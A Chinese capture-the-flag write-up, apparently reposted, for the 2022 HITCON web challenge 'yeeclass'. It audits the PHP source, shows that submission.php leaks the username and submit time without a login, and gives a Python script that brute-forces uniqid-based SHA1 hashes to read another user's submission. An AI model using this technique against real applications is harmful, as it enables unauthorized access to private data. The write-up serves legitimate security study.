复现平台CTFHUB
靶机为一个完整类论坛网页,题目给了服务端完整代码
代码审计
/src/submit.php Line56-63:
可以看到提交数据存入的时候将$_SESSION["username"]."_"
作为前缀,生成了一个uniqid。uniqid的生成方式即{sec:08x}{usec:05x}
/src/submission.php Line5-15:
在该查询界面中首选了hash
参数作为查询方式,
意味着如果获得存入数据库的时间
和username
即可模拟出hash
从而读取flag
/src/submission.php Line16-44:
允许了通过homeworkid
查询入库时间
和username
解题
在没有登录没有session
访问challenge-xxxx.sandbox.ctfhub.com:10800/submission.php?homeworkid=1得到提交时间
和username
而入库时间和uniqid
由于运行效率,会存在微秒时间差,因而需要爆破该时间差
exp文章来源:https://www.toymoban.com/news/detail-680257.html
import requests
import hashlib
from datetime import datetime, timezone
username = "flagholder"
timestamp = '2022-12-26 20:59:48.231534'
dt = datetime.fromisoformat(timestamp)#.replace(tzinfo=timezone.utc)
sec = int(dt.timestamp())
usec = dt.microsecond
print(sec, usec)
url = 'http://challenge-xxxx.sandbox.ctfhub.com:10800/submission.php?hash='
def get_hash(sec, usec):
user_id = f"{username}_{sec:08x}{usec:05x}"
return hashlib.sha1(user_id.encode()).hexdigest()
for i in range(0, 1000):
hash = get_hash(sec, usec - i)
r = requests.get(url + hash)
print(i, hash)
if r.text != "Submission not found.":
print("Found hash:", hash)
print(r.text)
break
运行结果:
文章来源地址https://www.toymoban.com/news/detail-680257.html
到了这里,关于2022-HitCon-Web-yeeclass WP的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!